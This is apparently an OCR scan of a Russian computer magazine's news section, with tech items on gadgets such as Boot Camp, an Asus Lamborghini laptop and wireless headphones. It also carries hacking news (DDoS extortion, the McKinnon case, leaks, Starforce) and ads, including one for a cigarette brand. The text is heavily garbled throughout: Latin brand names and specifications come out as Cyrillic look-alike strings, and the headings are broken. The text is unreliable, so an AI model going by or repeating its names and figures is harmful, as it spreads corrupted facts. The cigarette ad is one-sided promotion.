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1 БОТИНОК 0=%^ 
4 КОЛЕСА 

ЖИЗНЬ ПРОСТА И ПРЕКРАСНА! 



Для городских штучек, которые всегда 
хотят большего... ролики для фитнеса 
и кроссовки для всего остального. 
Подари себе целый день. Начни его с тренировки 
на роликах с удлиненной алюминиевой рамой 
и 84 мм колесами, продолжи тем, что радует тебя 
всегда. Сними роликовый каркас, чтобы пройтись 
по магазинам, зайди в салон красоты или 
перекуси с подружками, .. а потом с парой Ігопу І.Х 
отправляйся на вечернюю тренировку. 

Следи за собой... 

ГиеІ уоиг іпзііпсі! 
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НАРЮ ЫЕѴѴЗ — СЕРГЕЙ НИКИТИН 

Х-ЫЕѴѴ5 — МІЫОѴѴОВК 

НІ-ТЕСН ЫЕѴѴЗ — ЮРИЙ СВИДИНЕНКО 



МЕѲАИЕѴѴЗ 






ѴУІМРОѴѴЯ ХР НА МАКАХ 
С ПРОЦЕССОРОМ 
ОТІІ\ІТЕІ_ 



Окна и яблоки. Не так давно компания Арріе объявила о своем 
решении перевести ПК Масіпіюзіі на процессоры производства 
Іігіеі. Но это не стало концом сближения яблочников и плат- 
формы Іпіеі, ведь недавно общественности была представлена 
бета-версия продукта Вооі Сатр, который позволит запускать 
ОС \Ѵіпс1о\ѵ8 ХР на Маках с процессором от ІпТеІ . По заявлению 
представителя Арріе, его компания «не имеет никаких планов 
по продаже или поддержке \ѴіпсІо\ѵ8, но многие потребители 
заинтересованы в запуске АУіпсіоѵѵ» на новых компьютерах 
Арріе, которые теперь используют процессоры от Іпіеі» . 
Пользователям обещают очень простую и удобную инсталля- 
цию, после которой станет возможным выбор ОС для загрузки. 
Бета-версию можно скачать с сайта Арріе. Возможно, что скоро 
различия межу Мае и РС станут еще незаметнее. Вот вам и окна с 
яблоками. 




Мобильный накопитель 

Думаю, ты не откажешься иметь 
при себе переносной девайс, 
размером с визитку, на котором 
можно разместить несколько ги- 
габайтов информации. Это уже не 
флешка, а кое-что покруче. Такое 
устройство сегодня представляет 
компания ѴегЬаІіт: мобильный на- 
копитель Зіоге’п’Оо 115В НЮ Эгіѵе. 
Объем памяти, в зависимости от 
модели, составляет 4 или 8 Гб, 
информация хранится на жест- 
ком диске, который и является 
основой системы. Возможно, для 
кого-то 8 Гб уже не так много, но 
тут стоит сказать о размерах ус- 
тройства: 7x5.4x0.95 см при весе 
50 г! Это главный плюс продукта, 
который наверняка оценят люди, 
нуждающиеся в емком, компак- 
тном, а главное, мобильном но- 
сителе информации. В комплект 
поставки входит утилита МоЬіІе 
І_аипсНрасІ, дающая возмож- 
ность защитить файлы паролем, 
получить удаленный доступ к 
устройству и, вообще, расширить 
удобство и функциональность его 
работы. Интерфейс с компьюте- 
ром — 115В, кроме того, поддержи- 
ваются все популярные ОС. 



8ѴЕМ меняет цвета 

Казалось бы, в клавиатурах уже 
сложно придумать что-то новое: 
уже менялись цвета и форма уст- 
ройств, они оснащались дополни- 
тельными клавишами и колесиками 
прокрутки, лишались проводов и 
так далее. А компания 5ѵеп пошла 
по другому пути: она изменила цвет 
нанесения кириллических симво- 
лов на свои клавиатуры. Мелочь? 

А вот и нет! Ранее использовав- 
шиеся красные и белые символы 
плохо различались в темноте и 
вообще с трудом разбирались на 
темных клавиатурах, что приво- 
дило кухудшению зрения. Теперь 
же цвета букв Кирилла и Мефодия 
таковы: оранжевые на бежевых 
клавишах и голубые — на черных. 
Изменения коснулись, в частности, 
новинки 5ѵеп Іпіегпеі МиШтебіа 
660 — клавиатуры оригинального 
дизайна, оснащенной ІІ5В-хабом, 
дополнительными клавишами 
и встроенным картридером, 
понимающим девять наиболее 
распространенных форматов карт 
памяти. В продаже это устройство 
появится уже в мае. 
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Рональдиньо 

«Каждый танцует по-своѳму. 
Я танцую и забиваю». 



Бутсы ІЧіке Аіг І_едепсІ РѲ 
Когда только удар имеет значение... 




В любой игре наступает момент, когда только удар что-то 
действительно значит. И когда этот момент приходит, 
единственное, что важно - это бутсы Аіг І_едеп<± 
Эргономичный дизайн колодки и верхняя часть из мягкой 
кожи кенгуру обеспечивают комфорт и исключительное 
чувство мяча, а легкая и устойчивая подошва позволяет 
контролировать свои действия и легко менять направление 
движений. Результат - бутсы, которые позволяют 
всецело контролировать мяч. 



Мшум 



*Чувство мяча 

товар сертифицирован 



пікеТооіЬаІІ.сот 





ГАБАРИТЫ РАМ КИ 
СОСТАВЛЯЮТ 
212X164X105 ММ 
ПРИ ВЕСЕ 0.73 КГ 

I щт 

/ 

II / 1 



Рамка для фото — теперь все в 
цифре. Наверняка ты знаком с 
традицией дарить на праздники 
фотоальбомы или рамки для 
фотографий — либо дарили 
тебе, либо когда-нибудь дарил 
их сам. Вроде бы банальщина, 
но устройство РЫ1ір8 Оі^ііаі 
РЬоіо Бгате позволит воз- 
родить эту милую традицию. 

Это цифровая фоторамка с 
богатыми возможностями. Она 
имеет 7 -дюймовый дисплей 
на котором могут отображаться 
фотографии, загруженные со 
встроенного картридера (пони- 
мает 5 форматов) или через порт 
Н8В с совместимого устройс- 
тва. Есть несколько режимов 
просмотра: отдельные фото, 
мозаика, слайдшоу. Питание 
осуществляется через адаптер 
или от встроенного аккумулято- 
ра. Дисплей имеет разрешение 
720x480 пикселей, органы 
управления представлены 6-ти 
кнопками. Приятно, что имеет- 
ся русскоязычное меню, а экран 
поддерживает портретный ре- 
жим. Можно выбрать между уст- 
ройством в прозрачном корпусе 
или стилизованным под дерево 
— так что выбор есть для любого 
интерьера. Габариты рамки со- 
ставляют 212x164x105 мм при 
весе 0,73 кг. Устройство можно 
найти в продаже по цене менее 
250-ти долларов. 
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А 8 II 8 и І_атЬогдМпі 

Как ты думаешь, что скажут тебе друзья, когда ты заявишь им, что 
прикупил І_атЬогдЫпі? Думаю, отвисшие челюсти придется довольно 
долго поднимать с пола. Не стоит делать никаких уточнений, не нужно 
хвастаться ключами или брелоком, ведь речь идет о новом устройстве 
компании А51ІЗ — мощном и стильном ноутбуке І_атЬогдНіпі ѴХ1 . В 
его оформлении использованы логотипы І_атЬогдІпіпі, а по мощности 
и технической оснащенности он напоминает автомобили этой марки. 
Суди сам: он построен на платформе Іпіеі Сепігіпо Оио (двуядерный 
процессор Соге Оио Т2500, чипсет 945РМ), имеет гигабайт оперативной 
памяти 00В2 667, 120-гигабайтный винчестер, универсальный оптичес- 
кий ОѴО-привод, 1 5-дюймовый экран, видеоплату КІѴЮІА ОеРогсе 7400, 
а также модули беспроводной связи ѴѴі-Рі и ВІиеіооіН. К этому стоит 
добавить фирменную технологию управления питанием А51І5 Роѵѵег4 
Оеаг+, увеличивающую время автономной работы, и два варианта 
расцветки корпуса — желтый и черный. В продажу этот ноут поступит в 
мае по цене около трех тысяч долларов. 



Титановая память 

О том, как важна для ПК быстрая и надежная оперативная память, ска- 
зано уже столько, что повторяться просто не имеет никакого смысла. 
Помнят об этом и производители, которые предлагают подобные мо- 
дули. Один из них — компания ОС2ТесИпоІоду. Она представила свою 
новинку — серию ОС2 РС-3200 ЕІ_Тііапіит 00Р, которая отличается 
повышенной надежностью. Последняя достигается благодаря высоким 
требованиям к качеству продукции (вплоть до ручного тестирования). 
Также на надежность работы влияет фирменный теплорассеиватель, 
который подвергся доработке и стал более эффективным. Как понятно 
из названия, память соответствует стандарту РС-3200 (00В 400). Она 
имеет 2,8 В напряжения питания и тайминги СІ_ 2-3-2-5. Приобрести 
данный продукт можно как отдельными гигабайтными модулями, так и 
набором для СИаппеІ Кіі (две планки по гигабайту). Подчеркивая надеж- 
ность изделия, компания предоставляет пожизненную гарантию. 
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Ноутбук 50* ОѴѴ 36 



Уоиг рагіпег Іог Ьизіпе$$ 



5 й® на базе 

технологии Іпіеі® Сепігіпо 
для мобильных ПК 



■ размер и разрешение экрана 15.4" 

ѴѴ5ХСА+( 1680x1 050) 

■ встроенный проигрыватель (возможность 
проигрывания дисков без загрузки системы) 

■ устройство чтения карт памяти 

■ беспроводная сеть ѴѴіРі 

■ встроенный Ыиеіооіб 

■ сумка в комплекте 



ГАРАНТИЯ 



ГОДА 



г. Москва "Цефей" (095) 730-0164 «Нобел»(095) 784-76-36 "НТІ ІІсГ (495) 947-28-43, 741-13-88 “А.С.Гард тим” (495) 540-4180, (495) 540-4179 
г. Санкт-Петербург «Нобел» (812) 259-85-57 г. Иркутск ООО "Фирма Билайн" (3952) 24-00-24 г. Подольск Системная Автоматизация 
торговли (27) 68-02-79 г. Северодвинск м-н "Техномир"(8184) 527-000, (8184) 52-80-94 г. Архангельск «Группа Север» (8182) 66-19-61 
г. Магнитогорск «ІІСТ» (3519) 27-89-01 

ѵѵѵѵѵѵ.5с]2Ь.ги 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, Соге Іпзісіе, Іпіеі, , Іпіеі Соге, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі ЗреебЗіер, Іпіеі Ѵііѵ, Іпіеі Хеоп, Ііапіит, Ііапіит 
Іпзісіе, Репііит и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее 
подразделениям на территории США и других стран. 






СЕГОДНЯ В СТАНЕ 
БЕСПРОВОДНЫХ 
УСТРОЙСТВ 
ПОПОПНЕНИЕ- ■ 
НАУШНИКИ ЮОІТЕСН 





Долой провода! Все больше 
устройств сегодня отбрасывают 
провода, как ящерица ненужный 
хвост: информация переда- 
ется по воздуху, что гораздо 
удобнее, чем лианы соедини- 
тельных кабелей. Сегодня в 
стане беспроводных устройств 
пополнение — наушники 
Ьо^кесЬ, которые, избавившись 
от лишнего, ничуть от этого 
не страдают: радиус их дейс- 
твия составляет 50 метров, что 
дает тебе возможность слушать 
музыку, расхаживая по дому. 
Технически система представля- 
ет собой небольшой передатчик 
с ТГ8В -интерфейсом, подключа- 
емый к ПК, а также приемник, 
встроенный в наушники. Они 
настраиваются друг на друга еще 
при изготовлении, так что после 
включения никакой дополни- 
тельной настройки не потребу- 
ется. Чтобы избежать возмож- 
ных помех и наводок от других 
устройств, предусмотрена 
возможность изменения частоты 
работы. С помощью ПО из 
комплекта поставки и встро- 
енного устройства управления, 
которое расположено на правом 
наушнике, можно регулировать 
громкость звука, переключать 
треки и так далее. Поддержива- 
ется большинством современных 
мультимедийных плееров. 



ЫѴШІА 

Компания ІЧіѵісІа дѳлаѳт зачин для 
5оскеіАМ2. 

Несмотря на то, что и новое 
процессорное гнездо от АІѴЮ и 
соответствующие ему процес- 
соры пока существуют только в 
анонсах компании и, возможно, 
в ее засекреченных лаборато- 
риях, остальные игроки рынка 
уже активно выпускают для них 
комплектующие. 

Сегодня с несколькими такими 
решениями выступила компания 
ЫѴЮІА. Устройств в линейке 
МСР61 пока заявлено три: 
МСР61Р, МСР613 и МСР61 V. Пер- 
вая модель будет самой мощной, 
с одним слотом РСІ-Е хі 6 и двумя 
хі , также будут поддерживаться 
РАЮ-контроллер для дисков 8АТА 
и гигабитный сетевой адаптер. 

Две другие модели попроще — у 
них отнимут РАЮ, а максимальная 
скорость сетевой платы будет 
равняться 100 Мбит. Кроме того, 
на МСР61 3 будет ставиться 
слотРСІ-Ехргезз х8, ау МСР61Ѵ 
вообще не останется этой техно- 
логии. Зато у всех троих заявлена 
поддержка будущей ОС ѴѴіпбоѵѵз 
Ѵізіа. 

Выход чипсетов на рынок ожида- 
ется к осени, и, судя по их возмож- 
ностям, предназначены они для 
построения недорогих систем. 




Корпоративный страх 

За последний год в России на 
порядок выросло количество слу- 
чаев шантажа через Интернет. 

Но если раньше хакеры сначала 
добывали компрометирующую 
или конфиденциальную инфу 
и грозили ее обнародовать, то 
теперь все намного проще — они 
просто угрожают заОООЗ’ить 
сайт или отключить некоторые 
онлайновые сервисы в случае 
неуплаты. Как оказалось, инфор- 
мация о 90% таких случаев не 
доходит до МВД. 

В наше время многие компании 
ведут двойную бухгалтерию и 
попросту боятся, что если они 
обратятся в милицию, доблес- 
тные органы заинтересуются 
финансовыми делами компании. 
Да и мало кто сейчас верит в 
способности отдела «К». Пред- 
ставитель отдела компьютерных 
преступлений Руслан Стоянов 
заверил, что дела фирмы при 
расследовании преступления их 
мало интересуют, и для поимки 
хакера просматривать бухгалте- 
рию им не нужно. 

А вот в Великобритании с этим 
дела обстоят лучше. Там попрос- 
ту запрещено утаивать инфор- 
мацию о компьютерном взломе, 
поэтому практически все такие 
происшествия становятся извест- 
ны местной полиции. 
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Неуязвимость, которая достигается с компьютером Ехсітег™ Сате Мазіег на базе Процессора 
Іпіеі® Репііит® 4 640 с технологией НТ, превращает любое сражение в самопознание, а пределы 





ЭКСИМЕР" Баше Мааіег 

Іпіеі® Репііит® 4 640 с технологией НТ 
(2 МБ, 3.21Гц, 800МГц) 

МЬ М5І 915 СотЬо 2-Р 

ОС МісгозоТі® ѴѴіпсІоѵѵз® ХР Месііа Сепіег ЕсІіЧіоп (Виз) 
Память йРК2 РВАМ 1ГБ 533 МГц РС-4200/4300 
Видео ІЧѴЮІА 6800-65256Е 
СагсІ Веасіег 6 іп 1 
Жесткий диск 160ГБ, 

5АТА-300, 7200грш, 8МБ Привод 0Ѵй±ВѴѴ 
Порт РігеѴѴіге 
+ 

Антивирус 



ѴѴеЬ: ѵѵѵѵѵѵ.ехсітег.сот/датетазіег/ СПРАШИВАЙТЕ В МАГАЗИНАХ ЭЛЕКТРОНИКИ 




ехсітеп 



\л/\а/\л/. ехсітег. сот 



Компания Эксимер рекомендует 
лицензионную ОС МісгозоЯ® ѴѴіпсІоѵѵз® ХР 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, Іп*еІ, , Іпіеі Соге, ІпіеІ Іодо, Іпіеі Іпзісіе, ІпіеІ Іпзісіе Іодо, Іпіеі ЗреесіЗІер, ІпіеІ Ѵііѵ, Іп*еІ Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, Репііит и Репііит 
Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации ІпіеІ или ее подразделениям на территории США и других стран. 






ВОПЕТТЮРЬМЫ. л 
ПРИЧЕМ В МЕСТАХ 



НЕ САМЫХ 
БЛАГОПРИЯТНЫХ 













УѴІЫ05 ВУ ѴУІИЗТОИ 



НОВЫЙ ТАБАЧНЫЙ БРЕНД 

ДЛЯ ЯРКИХ ИНДИВИДУАЛЬНОСТЕЙ 



60 лет за взлом. В Великобритании продолжается заварушка 
вокруг судебного процесса над Гэри МакКинноном, который 
несколько месяцев назад взломал компьютерные сети НАСА и 
Министерства Обороны США. Если помнишь, этот чувак потом 
признавался журналистам, что нашел на правительственных 
компьютерах улики, подтверждающие существование НЛО, чем 
изрядно потрепал нервы высшим американским чинам. Теперь эти 
чины решили вернуть Гэри должок и требуют у британских властей 
передачи им «компьютерного террориста». Если это произойдет, 
хакера будут судить по антитеррористическим законам, а это 60 лет 
тюрьмы, причем в местах не самых благоприятных. 

Адвокаты МакКиннона, конечно, делают все возможное, чтобы 
этому помешать. В прошлом месяце был предоставлен документ 
из посольства США, где обещается, что дело Гэри не передадут в 
военный суд, и оно будет рассматриваться как обычное компью- 
терное преступление. Но документ оказался неподписанным и не 
убедил сторону защиты. Пока юристы решают, где будут судить 
хакера, виновник охотно общается с прессой, заверяя, что хакнул 
НАСА ради любопытства и не хотел нанести никакого вреда. 



Военная утечка 

Как ни охраняют конфиденциаль- 
ную инфу правительства разных 
стран, все равно она становится 
достоянием народа. Особенно 
много утечек произошло за про- 
шедшие два месяца. Например, 
в середине апреля с базы ВВС 
США, расположенной на японс- 
ком острове Хонсю, в Интернет 
уплыли данные о пропусках всех 
сотрудников. Любой желающий 
мог подделать документ и попасть 
внутрь объекта, где стоят истре- 
бители Р-16. Виновником утечки 
стал вирус, заразивший одну из 
программ на компьютерах базы. 
Также несколько утечек важной 
информации произошли у япон- 
цев. В инет просочились сведения 
о времени проведения военных 
учений и списки военного состава 
военных сил страны. 



Бойкот Старфорсу 

Против одной из самых наворо- 
ченных защит от копирования дис- 
ков — Зіайогсе — недавно был по- 
дан иск в суд. Все дело в том, что 
драйвер Старфорса сразу после 
инсталляции получает максималь- 
ный уровень доступа к ресурсам 
компа и довольно жесткими спо- 
собами сопротивляется копиро- 
ванию игр: при появлении любой 
подозрительной активности тачка 
просто ребутается. В итоге эта 
особенность Зіайогсе привела к 
судебному иску против компании 
ІІЬізоЙ, активно использующей 
эту защиту в своих продуктах. 
Инициатором 5-миллионного иска 
стал Крис Спенс. Помимо этого, в 
Сети появился сайт, создатели ко- 
торого призывают бойкотировать 
игры, защищенные Старфорсом. 
На ресурсе содержится инфор- 
мация об используемых методах 
защиты и объясняется, как злой 
драйвер может повредить юзеру. 



Курѳниѳ табака издавна входит в число жизненных 
удовольствий, а за удовольствия, как известно, нужно 
платить, и довольно регулярно. Титан мирового табачного 
бизнеса, ЬарапТоЬассо Іпііегпаіііопаі (Л I), производитель 
СатеІ, МІІсІ Зеѵеп и ѴѴІпзІоп, предлагает потребителям, кото- 
рых выражение «среднеценовой сегмент» скорее привлекает, 
недорогую марку ѴѴІпдз Ьу ѴѴІпзІоп (13,5 руб.), полностью отве- 
чающую всем международным стандартам. Тэглайн «отѴѴІпзйэп» 
не случаен — он призван вселять в сердца недоверчивых 
курильщиков уверенность в качестве новинки. Вместе с тем ѴѴІпдз 
Ьу ѴѴІпзйэп — абсолютно самостоятельный продукт, сделанный на 
основе уникальной табачной смеси категории Атегісап ЫепсІ. 
Говорят, две с половиной тысячи потребителей вслепую пробовали 
ѴѴІпдз Ьу ѴѴіпзІоп, сравнивали ихс другими марками, и им понравилось, 
так что, если твой бюджет на элитные сигары СоЬІЬа пока не рассчитан, 
почему бы не примерить надежные и современные ѴѴІпдз Ьу ѴѴіпзйэп. 
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ОНИ И НЕ ПОДО-І 
ЗРЕВАПИ. ЧТО ИХ 
КИБЕРѴТЕХАМИИ 
ЛЮБУЕТСЯ ХАКЕР 





Последствие фильтрации 

В США закончился суд над 
интернет-провайдером Ѵегігоп 
Соттипісаііопз. Г рупповой иск 
против него клиенты подали еще 
в прошлом году, после того как 
компания во время фильтрации 
спама блокировала поступаю- 
щую почту с некоторых географи- 
ческих зон. Таким образом, люди, 
ведущие переписку с родными и 
друзьями на другом конце света, 
не получили новых писем. Суд 
присудил выплатить каждому 
из 5-ти миллионов абонентов 
Ѵегігоп, пользовавшихся на 
протяжении года ее почтовыми 
услугами , до $28, а также возмес- 
тить стоимость сервиса за это 
время. Результат удовлетворил 
далеко не всех. Например, фирма 
«ЗѵѵіЙ & СгаІ» расценила свой 
ущерб в 1 ,4 миллиона долла- 
ров и собирается продолжать 
судебные тяжбы. Сам же пров 
себя виновным не считает. Как 
заявил представитель Ѵегігоп, 
они пытались настроить фильтр 
как можно оптимальнее, но в 
процессе возник сбой — с кем не 
бывает. Следующие слушания 
по этому делу состоятся в конце 
июня этого года. 



Красная угроза 

От братьев наших восточных 
поступила информация, что на 
территории Китая стала открыто 
и весьма активно действовать 
хакерская группировка, называю- 
щая себя «Альянс красных хаке- 
ров» . Создана она была с одной 
единственной целью: нести хаос 
и разрушения сетевым ресурсам 
США. «Альянс» уже взял на себя 
ответственность за десятки тысяч 
взломов, среди которых оказа- 
лись и многие ранее нераскрытые. 
Особенной любовью у «красных» 
пользуются правительственные 
сайты. Примечательно то, что 
китайские кибертеррористы даже 
не думают прятаться, мало того 
— открыто приглашают вступить 
в их ряды и бороться с американ- 
ским злом. Неофициальные источ- 
ники утверждают, что хакгруппа 
поддерживается правительством 
Китая, правда, вряд ли кто-то возь- 
мется это подтвердить. Вообще, 
китайцы в Сети последнее время 
ведут все более агрессивную 
деятельность против США. Таки 
до войны недалеко. 




Порношантаж. В китайском городе Янгжу полиция арестовала 
хакера, решившего подзаработать шантажом мирных супругов. 
Когда мужу пришлось уехать в командировку в Пекин, семейная 
пара решила воспользоваться благами цивилизации и организовать 
видеоконференцию, в процессе которой они демонстрировали 
друг другу свои обнаженные прелести. Они и не подозревали, что 
их киберутехами любуется хакер, который вскоре вышел на связь и 
потребовал кругленькую сумму. Платить супруги не стали, а вместо 
этого обратились в полицию. Хакера арестовали через несколько 
дней. На допросе парень признался, что на самом деле он не ахти 
какой компьютерный спец, а программой для проникновения на 
чужие компьютеры с ним поделился друг. На комп мисс Нагасаки 
он наткнулся совершенно случайно, именно в тот момент, когда она 
показывала мужу виртуальный топлесс. «Я не думал, что нарушаю 
какие-то законы. А денег попросил ради прикола», — с горестью 
добавил взломщик. Китайская полиция прикол не оценила, и теперь 
хакера ждет если не расстрел, то долгий срок точно. 



Я НЕ ДУМАЛ. ЧТО НАРУШАЮ ЗАКОН. 
А ДЕНЕГ ПОПРОСИЛ РАДИ ПРИКОЛА 




Вредный патч от Місгозоіі 

Принято считать, что патч — это программа, направленная на устра- 
нение определенных багов в системе. Похоже, что у МісгозоЙ это оп- 
ределение несколько другое. В середине апреля компания выпустила 
заплатку, закрывающую критическую уязвимость в винде, с помощью 
которой можно было выполнить на компьютере произвольный код. 

Но вскоре после его установки тысячи юзеров столкнулись с новыми 
проблемами. У кого-то отказывался работать принтер, у кого-то не 
определялся цифровой фотик, у некоторых комп вообще стал перезаг- 
ружаться безо всяких на то причин. Оказалось, что вся проблема — в 
файле Ѵегсізіб.ехе, находящемся в составе патча и конфликтующим 
с разными устройствами. Сайт техподдержки Місгозойбыл просто 
завален жалобами, и пока компания пыталась решить эту проблему, на 
компьютерных форумах стали появляться «любительские» решения: от 
переименования ѵегсізісі перед установкой до отключения процессов в 
диспетчере задач. МісгозоІІ попытались успокоить всех, типа «зоггу, зЫІ 
Иаррепз», и напомнили, что несмотря на возможную сырость патчей, 
вырубать автообновление системы для здоровья компьютера не реко- 
мендуется. Думаю, к моменту выхода журнала патч уже будет пофиксен. 
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Видео на ходу 

Хочешь идти по улице и смотреть новый фильм? Это 
теперь возможно с новым кибердисплеем от Коріп. 

Г аджет, называемый Коріп СуЬегМап ОѴЭ51 0-ЗЭ, 
способен воспроизводить перед твоими глазами 
высококачественное трехмерное изображение на 
виртуальном 40-дюймовом экране, который как бы 
расположен на двухметровом расстоянии от глаз. 
Основа гаджета — цветные 0,44-дюймовые микро- 
дисплеи Коріп СуЬеЮізрІау. Ранее они использо- 
вались только в военных системах визуализации 
данных. Кибердисплей характеризуется ѴОА-разре- 
шением 640 х 480 пикселей, низким энергопотребле- 
нием и способностью отображать 16,7 млн. цветов. 
При этом Коріп СуЬегМап (ЗѴЭ51 0-30 имеет сов- 
местимость с платформой ѴѴіпбоѵѵз, а также может 
использоваться с игровыми консолями МісгозоЙХЬох 
(включая ХЬох 360) и Золу РІауЗіаІіоп 2. СуЬеЮізрІау 
характеризуется высокой плотностью пикселей на 
квадратный дюйм, что позволило создать устройство 
с большим графическим разрешением. Дисплей 
имеет низкую стоимость (в пределах $300, в зависи- 
мости от модели), что делает видеоочки доступными 
среднему геймеру. 




Как работает Билл Г ейтс? 

Недавно в журнале РогЬез появилась интересная 
статья, в которой Билл Г ейтс рассказывает о своем 
рабочем месте и условиях. Билли, оказывается, 
использует сразу 3 монитора: на левом отображается 
список новых емейлов, на среднем — текст отправ- 
ляемого сообщения, на правом — старый-добрый 
Эксплорер, которым миллиардер серфитлокальную 
и всемирную Сеть. Приходящее мыло поступает 
через многоуровневую фильтрацию, и в результате 
остается около ста писем в день, которые нужно про- 
читать. Еще кипу писем доставляет потом помощник 
— это те, которые не прошли фильтр, но могут быть 
полезными. Вся поступающая почта сортируется им 
в порядке приоритета. В первую очередь Билл про- 
сматривает емейлы с пометкой «срочно». Компьютер 
главы Місгозой подключен ко внутренней сети компа- 
нии, и мистер Г ейтс активно использует возможности 
локального поиска. Он всюду носит с собой КПК, где 
хранит всю важную для себя информацию. В каби- 
нете миллиардера также находится доска, которую 
он с коллегами использует для мозгового штурма. 
Сделанные на этой доске записи могут быть тут же 
преображены в цифровые фотографии и скопиро- 
ваны на компьютер. Раз в год Билл берет для себя 
«неделю раздумий» — небольшой отпуск, во время 
которого он знакомится с предложениями и идеями 
сотрудников по поводу дальнейшего развития 
МісгозоЙ. Эта «неделя» уже стала, по сути, традици- 
онной и используется Биллом уже 12 лет. 




Клава для геймера 

Если ты заядлый геймер и тебе не жалко $100, то клавиатура І_одіІесЬ СП 5 
(Затіпд КеуЬоагб точно для тебя! Подсветка клавиш, выносной складываю- 
щийся ЖК-экран и ІІЗВ-подкпючение облегчат твою жизнь во многих играх. 
Так, например, в 04 можно вывести на ЖК-экран инфу о боеприпасах и на- 
строить дополнительные кнопки под особенности игры. Если же ты играешь 
в квесты или другие игры, где боеприпасы не имееют никакого значения, то 
на экранчик можно вывести аську или почтовые заголовки. Еще один плюс 
клавы — беспроводная связь, то есть ты можешь таскать ее по дому или офису 
беспрепятственно. Ну и 18 программируемых добавочных кнопок в качест- 
ве бонуса. Их, например, можно настроить на кастование спеллов в ѴѴогІб оі 
ѴѴагсгаЙ или же добавить собственные сложные макросы. Естественно, что 
кнопок управления видео/аудио и других, уже привычных в мультимедиа-кла- 
вах, никто не отменял. 




кОМПкиОТ^ры и КОМПА#КГуіОЩиО 
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Оцифрованный вирус 

Вирусы в компе — не новость. 
Однако на этот раз в суперком- 
пьютере появился не простой 
вирус, а настоящий природный. 
Уже много лет биологи мечтают 
создать поатомную цифровую 
модель какого-нибудь организма 
с тем, чтобы затем поселить его 
в компьютере и наблюдать за его 
развитием и жизнью. И нако- 
нец им это удалось. В качестве 
цифрового жителя выбрали 
одного из простейших вредите- 
лей — круглый вирус табачной 
мозаики. Его размер составляет 
всего около 20 нм. Свое название 
он получил зато, что не может 
даже самостоятельно взять под 
контроль клетку, а размножается 
только в тех клетках, которые 
уже атакованы вирусом табачной 
мозаики. Структура всех его бел- 
ков давно известна — осталось 
всю эту инфу вручную набить в 
протеиновой проге-моделлере 
и перенести в суперкомпьютер. 
Пока модель не позволяет про- 
следить за поведением вируса 
в клетке, поскольку для этого 
понадобилось бы смоделировать 
внутриклеточную среду. Однако 
расчет, выполненный в Амери- 
канском национальном центре 
суперкомпьютерных приложе- 
ний (ІМСЗА), позволил в течение 
короткого отрезка модельного 
времени проследить за динами- 
кой вируса, когда он предостав- 
лен самому себе. Ждем-с. Не за 
горами оцифрованная модель 
бабы Клавы. 




Башня табака 

Небоскребы — небоскребам 
рознь. И это еще раз подтверж- 
дают китайцы в новом проекте 
здания Национальной табачной 
компании (СІМТС) в городе Гуань- 
джоу. Эта уникальная архитектур- 
ная конструкция не будет потреб- 
лять электричество из городской 
сети вообще! Такая архитектура 
называется ноль-здание, или 
здание с нулевым балансом 
энергии. Проект подготовила 
известная чикагская архитектур- 
ная компания Зкібтоге, Оѵѵіпдз & 
МеггіІІ (ЗОМ). Она предусмотрела 
интересное инженерное реше- 
ние, позволившее построить 
башню. 300-метровая 69-этажная 
«Башня жемчужной реки» (РеагІ 
ВіѵегТоѵѵег) имеет ряд плавных 
фасадов, направляющих ветер в 
технические этажи, где распола- 
гаются ветрогенераторы, обеспе- 
чивающие электроэнергией всю 
конструкцию. Кроме этого, будет 
выполнено специальное двойное 
остекление южного фасада (с 
вентиляцией между стекол), спо- 
собствующее снижению нагрева 
здания. Но и это еще не все. Для 
служащих придуманы специаль- 
ные автоматические жалюзи, 
поворачивающиеся на нужный 
угол по мере путешествия солнца 
по небу, а также открывающиеся 
в пасмурную погоду для увели- 
чения естественного освещения 
офисов. Все вышеперечислен- 
ные методы снизят затраты на 
кондиционирование гиганта. 
Китацы имеют шанс стать первой 
нацией, построившей полностью 
энергонезависимый небоскреб. 




САМ АППАРАТ 
ПРЕДСТАВЛЯЕТ СОБОЙ 
ОБЫЧНЫЙТОППИВНЫЙ 
ЭЛЕМЕНТ С НЕОБЫЧ- 
НЫМ ИСТОЧНИКОМ 
ВОДОРОДА 



Нотер на сухом алюминии и воде. Проблема с потерей заряда 
батарейки на нотере, когда розетки рядом нет, тебе наверняка 
знакома. Японцы предлагают заменить проклятые батарейки на 
аппарат, который ест чистый алюминий и... воду, выдавая при 
этом честное питание для нотера. Сам аппарат представляет собой 
обычный топливный элемент с необычным источником водорода. 
Он не требует заправки водородом и даже спиртом (как первые 
серийные топливные элементы для переносной электроники). 
Вместо этого он потребляет порошок алюминия и воду в специ- 
альных картриджах. Чистый алюминий, лишенный своей обычной 
оксидной пленки, даже при комнатной температуре бурно реаги- 
рует с водой. Блок НііасЬі Махеіі с габаритами 16 х 10 х 
6 сантиметров и весом 920 граммов развивает продолжительную 
мощность в 10 Вт и пиковую — в 20 Вт. Напряжение составля- 
ет 7,4 вольта. 20 граммов алюминия обеспечивают 4 — 5 часов 
работы нотера! Благодаря специально разработанной техноло- 
гии производства «активных» алюминиевых частиц, выделение 
водорода из воды на один грамм использованного алюминия в 
батарейке близко к теоретическому пределу. Инженеры из НйасЫ 
уверены, что такие системы можно будет еще уменьшить, увеличив 
также и мощность (примерно до 100 Вт), а для производства 
алюминиевых картриджей можно перерабатывать дешевый лом. 
Кстати, большинство старых советских кастрюль сделано из него, 
родимого... 
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Настольный ДВС 

Выбрось все свои старые безделушки: маятниковые часики, дельфинчиков 
и глобусы, качающиеся от магнитов. Британская компания Оѵгозсоре.сот 
предлагает тебе реально крутой девайс: работающий настольный двигатель 
внутреннего сгорания! Правда, «всего» за $621. Но зато что ты получишь на- 
стоящий работающий Ѵ-Тѵѵіп с медным колесом-маховиком, с полированным 
ободом и хромированными выхлопными трубами. Высота этого двигателя со- 
ставляет 24 сантиметра, длина — 1 8 сантиметров, а ширина — 1 5 сантимет- 
ров. Диаметр маховика — 12,3 сантиметра. А вес этого монстра с подставкой 
и маленьким топливным баком — 2,5 килограмма. Все подвижные элементы 
